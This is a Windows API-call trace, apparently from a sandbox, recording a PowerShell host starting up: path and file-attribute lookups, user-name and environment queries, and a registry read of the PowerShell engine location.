	[0323.585] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ccf50 | out: lpFileInformation=0x1ccf50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0323.585] SetErrorMode (uMode=0x1) returned 0x1
	[0323.585] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0323.585] SetErrorMode (uMode=0x1) returned 0x1
	[0323.585] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ccf50 | out: lpFileInformation=0x1ccf50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0323.585] SetErrorMode (uMode=0x1) returned 0x1
	[0323.585] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ccd50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0323.585] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ccc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0323.585] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.586] SetErrorMode (uMode=0x1) returned 0x1
	[0323.586] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ccf50 | out: lpFileInformation=0x1ccf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0323.586] SetErrorMode (uMode=0x1) returned 0x1
	[0323.586] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.586] SetErrorMode (uMode=0x1) returned 0x1
	[0323.586] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ccf50 | out: lpFileInformation=0x1ccf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0323.586] SetErrorMode (uMode=0x1) returned 0x1
	[0323.586] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.587] SetErrorMode (uMode=0x1) returned 0x1
	[0323.587] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ccf50 | out: lpFileInformation=0x1ccf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.587] SetErrorMode (uMode=0x1) returned 0x1
	[0323.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.587] SetErrorMode (uMode=0x1) returned 0x1
	[0323.587] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ccf50 | out: lpFileInformation=0x1ccf50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.587] SetErrorMode (uMode=0x1) returned 0x1
	[0323.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ccc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.587] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.588] SetErrorMode (uMode=0x1) returned 0x1
	[0323.588] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ccf90 | out: lpFileInformation=0x1ccf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0323.588] SetErrorMode (uMode=0x1) returned 0x1
	[0323.588] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.588] SetErrorMode (uMode=0x1) returned 0x1
	[0323.588] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ccf90 | out: lpFileInformation=0x1ccf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0323.588] SetErrorMode (uMode=0x1) returned 0x1
	[0323.588] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ccd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0323.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.589] SetErrorMode (uMode=0x1) returned 0x1
	[0323.589] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ccf90 | out: lpFileInformation=0x1ccf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.589] SetErrorMode (uMode=0x1) returned 0x1
	[0323.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.589] SetErrorMode (uMode=0x1) returned 0x1
	[0323.589] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ccf90 | out: lpFileInformation=0x1ccf90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.589] SetErrorMode (uMode=0x1) returned 0x1
	[0323.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ccc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0323.591] SetErrorMode (uMode=0x1) returned 0x1
	[0323.591] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd250 | out: lpFileInformation=0x1cd250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0323.591] SetErrorMode (uMode=0x1) returned 0x1
	[0323.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0323.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0323.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0323.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0323.969] CoTaskMemAlloc (cb=0x804) returned 0x1b74cf30
	[0323.969] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b74cf30, nSize=0x1cd5b8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd5b8) returned 0x1
	[0323.969] CoTaskMemFree (pv=0x1b74cf30) 
	[0323.969] CoTaskMemAlloc (cb=0x204) returned 0x2a92a0
	[0323.969] GetUserNameW (in: lpBuffer=0x2a92a0, pcbBuffer=0x1cd5f8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd5f8) returned 1
	[0323.969] CoTaskMemFree (pv=0x2a92a0) 
	[0323.971] ReportEventW (hEventLog=0x1b960008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2df5398*="Available", lpRawData=0x2df5128) returned 1
	[0324.680] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0324.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.680] CoTaskMemFree (pv=0x2a1100) 
	[0324.681] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0324.681] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0324.682] CoTaskMemFree (pv=0x2a1100) 
	[0324.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.688] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0324.688] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0324.688] CoTaskMemFree (pv=0x2a1100) 
	[0324.689] CoTaskMemAlloc (cb=0x104) returned 0x2a1100
	[0324.689] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2a1100, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0324.689] CoTaskMemFree (pv=0x2a1100) 
	[0324.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.691] GetCurrentProcessId () returned 0x9f4
	[0324.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0324.695] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x2e8) returned 0x0
	[0324.695] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd55c, lpData=0x0, lpcbData=0x1cd558*=0x0 | out: lpType=0x1cd55c*=0x1, lpData=0x0, lpcbData=0x1cd558*=0x56) returned 0x0
	[0324.695] CoTaskMemAlloc (cb=0x5a) returned 0x3015d0
	[0324.695] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd52c, lpData=0x3015d0, lpcbData=0x1cd528*=0x56 | out: lpType=0x1cd52c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd528*=0x56) returned 0x0
	[0324.695] CoTaskMemFree (pv=0x3015d0) 
	[0324.695] RegCloseKey (hKey=0x2e8) returned 0x0
	[0324.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
